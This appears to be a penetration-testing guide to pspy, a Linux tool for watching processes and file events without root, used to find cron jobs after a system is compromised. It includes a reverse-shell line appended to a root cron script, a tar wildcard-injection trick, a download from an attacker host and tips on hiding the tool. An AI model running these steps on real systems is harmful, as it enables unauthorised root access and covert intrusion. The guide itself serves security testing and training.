pspy
pspy monitors processes and filesystem events on Linux systems without requiring root access. It uses inotify to detect file changes and procfs scanning to identify running commands, making it invaluable for discovering cron jobs, scheduled tasks, and privilege escalation vectors during post-exploitation.
Installation
Section titled “Installation”Download Binary
Section titled “Download Binary”Grab the latest release from the GitHub releases page:
# Download pspy64 (64-bit systems)
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
# Download pspy32 (32-bit systems)
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy32
chmod +x pspy32Build from Source
Section titled “Build from Source”Requires Go 1.16+:
git clone https://github.com/DominicBreuker/pspy.git
cd pspy
go build -o pspy64 -ldflags="-s -w"Alternative: Base64 Encoding (for transfer)
Section titled “Alternative: Base64 Encoding (for transfer)”# On attacker machine
base64 -w 0 pspy64 > pspy64.b64
# On target machine
echo "[base64-content]" | base64 -d > pspy64
chmod +x pspy64Quick Start
Section titled “Quick Start”Basic Monitoring
Section titled “Basic Monitoring”# Default monitoring (all options enabled)
./pspy64
# Monitor with procfs scanning only
./pspy64 -p
# Monitor with filesystem events only
./pspy64 -fOutput Interpretation
Section titled “Output Interpretation”2026/04/17 14:23:45 CMD: UID=0 PID=1234 /usr/sbin/CRON -f
2026/04/17 14:23:46 FS: RENAME name=/var/log/auth.log.1
2026/04/17 14:23:47 CMD: UID=1000 PID=5678 /bin/bash /home/user/backup.shHow It Works
Section titled “How It Works”inotify Filesystem Monitoring
Section titled “inotify Filesystem Monitoring”pspy watches for filesystem events using inotify, which doesn’t require root:
| Component | Description |
|---|---|
| inotify watches | Monitors /tmp, /etc, /home, /var, /usr by default |
| Event types | CREATE, WRITE, DELETE, CHMOD, RENAME, OPEN |
| No root required | Works as unprivileged user |
| Real-time detection | Catches file changes instantly |
procfs Scanning
Section titled “procfs Scanning”Continuously reads /proc to identify running processes:
# pspy scans /proc/[pid]/cmdline and /proc/[pid]/status
# Updates process list every interval (default: 100ms)
# Can catch short-lived processes if interval is low enoughProcess Detection Method
Section titled “Process Detection Method”1. Read all /proc/[pid]/cmdline files
2. Compare with previous snapshot
3. Report new processes with UID and PID
4. Track process exit via /proc disappearanceCommand Line Options
Section titled “Command Line Options”Scanning Options
Section titled “Scanning Options”| Flag | Description | Default |
|---|---|---|
-p | Enable procfs scanning | true |
-f | Enable filesystem events | true |
-i | procfs scan interval (ms) | 100 |
-d | Directories for procfs scanning | /proc |
-r | Directories to watch with inotify | /tmp:/etc:/home:/var:/usr |
-c | Colorize output | false |
--debug | Enable debug logging | false |
Advanced Usage
Section titled “Advanced Usage”# Low interval for catching short-lived processes
./pspy64 -i 50
# Color output
./pspy64 -c
# Custom watch directories
./pspy64 -r /var/www:/opt
# Debug mode
./pspy64 --debug
# Combined options
./pspy64 -p -f -c -i 75 -r /etc:/homeIdentifying Cron Jobs
Section titled “Identifying Cron Jobs”Watch for Periodic Commands
Section titled “Watch for Periodic Commands”# Monitor for exactly 2 minutes (typical cron check interval)
./pspy64 -c | tee pspy.log
# Look for recurring patterns in timestamps
# Common patterns:
# - /usr/sbin/CRON -f (every minute if minutely cron)
# - /bin/sh -c (cron job execution)
# - /usr/bin/python /path/to/script.py (interpreted scripts)Common Cron Processes
Section titled “Common Cron Processes”| Process | Meaning |
|---|---|
/usr/sbin/CRON -f | cron daemon checking for jobs |
/bin/sh -c [command] | cron executing a command |
/usr/sbin/anacron | anacron running delayed jobs |
run-parts /etc/cron.X | executing cron.daily/hourly/weekly |
Extract Cron Paths
Section titled “Extract Cron Paths”# Monitor output, note any scripts called repeatedly
./pspy64 -c | grep -E "(\.sh|\.py|\.pl)"
# Check if detected scripts are world-writable
ls -la /path/to/detected/script.shPrivilege Escalation Vectors
Section titled “Privilege Escalation Vectors”Writable Cron Scripts
Section titled “Writable Cron Scripts”# pspy output shows: /root/backup.sh called as root
# Check if writable:
ls -la /root/backup.sh
# If writable, add reverse shell
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' >> /root/backup.shWorld-Writable PATH Directories
Section titled “World-Writable PATH Directories”# If cron runs: /usr/bin/python check.py
# Check PATH traversal:
echo $PATH
# Look for writable dirs like /tmp, /var/tmp
ls -ld /tmp /var/tmp /usr/local/binService Restarts with Writable Configs
Section titled “Service Restarts with Writable Configs”# pspy shows: /usr/sbin/service apache2 restart
# Check config file permissions:
ls -la /etc/apache2/apache2.conf
# If writable, inject malicious configWildcard Injection in Scheduled Tasks
Section titled “Wildcard Injection in Scheduled Tasks”# If cron runs: tar czf backup.tar.gz /var/www/*
# Create files in /var/www:
touch /var/www/--checkpoint=1
touch "/var/www/--checkpoint-action=exec=sh"
# tar expands wildcard and reads flagsFilesystem Event Monitoring
Section titled “Filesystem Event Monitoring”inotify Event Types
Section titled “inotify Event Types”| Event | Triggered by |
|---|---|
| CREATE | New file created |
| WRITE | File content modified |
| DELETE | File removed |
| CHMOD | Permissions changed |
| RENAME | File renamed |
| OPEN | File opened |
Watch Custom Directories
Section titled “Watch Custom Directories”# Monitor web application directory for changes
./pspy64 -r /var/www:/var/log/apache2
# Watch cron directories
./pspy64 -r /etc/cron.d:/etc/cron.daily:/etc/cron.hourly
# Monitor user home directories
./pspy64 -r /home:/rootFilter Events by Type
Section titled “Filter Events by Type”# Only show file creations
./pspy64 | grep "FS:.*CREATE"
# Only show process executions as root
./pspy64 | grep "UID=0.*CMD:"
# Exclude certain paths
./pspy64 | grep -v "/proc/"Filtering Output
Section titled “Filtering Output”Grep for Specific Processes
Section titled “Grep for Specific Processes”# Only show root processes
./pspy64 | grep "UID=0"
# Find PHP execution
./pspy64 | grep php
# Monitor specific user
./pspy64 | grep "UID=33" # www-data on Debian
# Multiple filters
./pspy64 | grep "UID=0" | grep -E "(\.sh|\.py)"Save to File for Analysis
Section titled “Save to File for Analysis”# Redirect output
./pspy64 > /tmp/pspy_output.txt 2>&1 &
# Monitor with tail
tail -f /tmp/pspy_output.txt
# Analyze after collection
grep "UID=0" /tmp/pspy_output.txtTimestamp Analysis
Section titled “Timestamp Analysis”# Add dates for pattern analysis
date >> pspy.log && ./pspy64 >> pspy.log 2>&1 &
# Find periodic tasks (compare timestamps)
grep "backup.sh" pspy.log | head -5
# Calculate interval between runs
# Use awk to compute differences
awk '{print $2}' pspy.log | uniq -cTransfer to Target
Section titled “Transfer to Target”wget (most common)
Section titled “wget (most common)”# If wget available
wget -O /tmp/pspy64 https://your.server/pspy64
chmod +x /tmp/pspy64
./pspy64curl Alternative
Section titled “curl Alternative”curl -o /tmp/pspy64 https://your.server/pspy64
chmod +x /tmp/pspy64Python HTTP Server
Section titled “Python HTTP Server”# Attacker machine
cd /path/to/pspy && python3 -m http.server 8000
# Target machine
wget http://attacker.ip:8000/pspy64 -O /tmp/pspy64SCP Transfer
Section titled “SCP Transfer”scp pspy64 user@target:/tmp/
ssh user@target
chmod +x /tmp/pspy64
./pspy64Base64 Encoding
Section titled “Base64 Encoding”# Attacker: encode binary
base64 -w 0 pspy64 && echo
# Target: decode and execute
echo "[base64_string]" | base64 -d > /tmp/pspy64
chmod +x /tmp/pspy64Practical Examples
Section titled “Practical Examples”Finding Root Cron Jobs
Section titled “Finding Root Cron Jobs”# Run pspy64 in background
./pspy64 -c > /tmp/pspy.log 2>&1 &
# Wait 5-10 minutes for cron executions
sleep 600
# Analyze results
grep "UID=0" /tmp/pspy.log | grep -E "\.sh|\.py" | sort | uniq
# Check if any found scripts are writable
# Edit vulnerable scripts to gain root shellMonitoring Backup Scripts
Section titled “Monitoring Backup Scripts”# Start monitoring
./pspy64 -i 50 -c | tee backup_monitor.log
# Look for:
# - tar/zip commands
# - rsync/cp operations
# - Database dumps (mysqldump, pg_dump)
# - Permission changes on archive files
# Typical output:
# 2026/04/17 02:15:00 CMD: UID=0 /usr/bin/tar czf /backup/data.tar.gz /homeDetecting Service Restarts
Section titled “Detecting Service Restarts”# Monitor for service commands
./pspy64 | grep -E "service|systemctl|/etc/init.d"
# Watch for dependency chains:
# - Apache restart → kills old processes → spawns new ones
# - Configuration reload → file changes → process restart
# - Log rotation → file movement → daemon reload
# Check if service config is writable
ls -la /etc/apache2/apache2.conf /etc/nginx/nginx.confTroubleshooting
Section titled “Troubleshooting”No Output Displayed
Section titled “No Output Displayed”# Ensure both scanning methods enabled
./pspy64 -p -f
# Verify inotify watches are working
cat /proc/sys/fs/inotify/max_user_watches
# If low, may need to increase (requires root or high limit)
# Check filesystem permissions
ls -la /tmp /etc /homeMissing Processes
Section titled “Missing Processes”# Increase scan frequency for faster detection
./pspy64 -i 50 # 50ms instead of default 100ms
# Enable debug mode to troubleshoot
./pspy64 --debug
# Check /proc accessibility
ls -la /proc/1/cmdlineHigh CPU Usage
Section titled “High CPU Usage”# Decrease scan frequency
./pspy64 -i 200 # Less frequent scans
# Disable filesystem events if not needed
./pspy64 -p # procfs scanning only
# Reduce watched directories
./pspy64 -r /etc:/home # Fewer paths to watchBest Practices
Section titled “Best Practices”Stealth Monitoring
Section titled “Stealth Monitoring”# Run in background with redirected output
nohup ./pspy64 > /tmp/.pspy.log 2>&1 &
# Use non-standard directory name
cp pspy64 /tmp/system_monitor
./system_monitor -c > /dev/null 2>&1 &
# Monitor PID file for process resurrection
(./pspy64 &> /tmp/.monitor.log &) && echo $! > /tmp/.pidData Collection
Section titled “Data Collection”# Long-term monitoring (hours)
./pspy64 -c > /tmp/pspy_full.log 2>&1 &
# Let it run during business hours
# Analyze patterns afterward
grep "UID=0" /tmp/pspy_full.log | wc -lAnalyzing Results
Section titled “Analyzing Results”# Find unique commands run as root
grep "UID=0.*CMD:" pspy.log | awk '{print $NF}' | sort | uniq
# Find repeated executions (potential cron)
grep "UID=0.*CMD:" pspy.log | awk '{print $NF}' | sort | uniq -c | sort -rn
# Extract just the command paths
grep "CMD:" pspy.log | sed 's/.*CMD: //' | awk '{print $NF}' | sort | uniqRelated Tools
Section titled “Related Tools”| Tool | Purpose |
|---|---|
| LinPEAS | Automated privilege escalation enumeration (includes cron/suid/cap detection) |
| linux-exploit-suggester | Matches kernel/software versions to known exploits |
| Linux Smart Enumeration (LSE) | Manual enumeration focused on privilege escalation paths |
| ps auxww | Traditional process listing (root-privileged view limited) |
| watch | Monitor command output with periodic execution |
| auditd | Kernel-level audit logging (requires root access) |
| systemd-analyze | Analyze systemd startup time and unit dependencies |
pspy vs Alternatives
Section titled “pspy vs Alternatives”pspy64 → Unprivileged, real-time, filesystem + process events
LinPEAS → Comprehensive enumeration, suggests exploits
auditd → Kernel audit (root required), persistent logging
ps auxww → Static snapshot, no real-time monitoring
watch → Periodic command execution, no background monitoring